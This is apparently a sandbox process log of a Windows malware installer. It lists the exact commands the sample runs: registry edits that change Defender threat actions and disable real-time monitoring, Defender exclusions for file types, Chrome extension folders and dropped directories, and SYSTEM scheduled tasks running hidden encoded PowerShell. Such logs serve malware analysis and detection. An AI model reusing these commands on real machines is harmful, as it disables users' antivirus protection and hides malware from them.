C:\Users\Admin\AppData\Local\Temp\54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112.exe

"C:\Users\Admin\AppData\Local\Temp\54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112.exe"

C:\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe

.\Install.exe /WzmdidRUAH "525403" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bcicWGWSPuqTxjDSpV" /SC once /ST 22:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\RtJHCEf.exe\" Yw /vTVdidiOAA 525403 /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bcicWGWSPuqTxjDSpV"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bcicWGWSPuqTxjDSpV

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bcicWGWSPuqTxjDSpV

C:\Windows\system32\taskeng.exe

taskeng.exe {6496B362-9F7B-4532-BDE7-544E191766BD} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\RtJHCEf.exe

C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\RtJHCEf.exe Yw /vTVdidiOAA 525403 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gkBlSvLeS" /SC once /ST 20:24:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gkBlSvLeS"

C:\Windows\system32\taskeng.exe

taskeng.exe {928A87CA-2287-47C5-9522-6ABCBDCF4373} S-1-5-21-2737914667-933161113-3798636211-1000:PUMARTNR\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gkBlSvLeS"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gzzJFGrTR" /SC once /ST 10:29:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gzzJFGrTR"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gzzJFGrTR"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\HKomOEKiubDeyUja\zLhHmZnO\nrOwqQxslnUsDsUC.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\HKomOEKiubDeyUja\zLhHmZnO\nrOwqQxslnUsDsUC.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wpmocubwzvTKZWVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wpmocubwzvTKZWVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wpmocubwzvTKZWVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wpmocubwzvTKZWVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gBynMMgCW" /SC once /ST 09:40:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gBynMMgCW"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gBynMMgCW"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "emrEEeoVdUigmulhl" /SC once /ST 19:37:16 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe\" 4u /bttddidmC 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "emrEEeoVdUigmulhl"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 292

C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe

C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\LPqdfDh.exe 4u /bttddidmC 525403 /S

C:\Windows\SysWOW64\cmd.exe

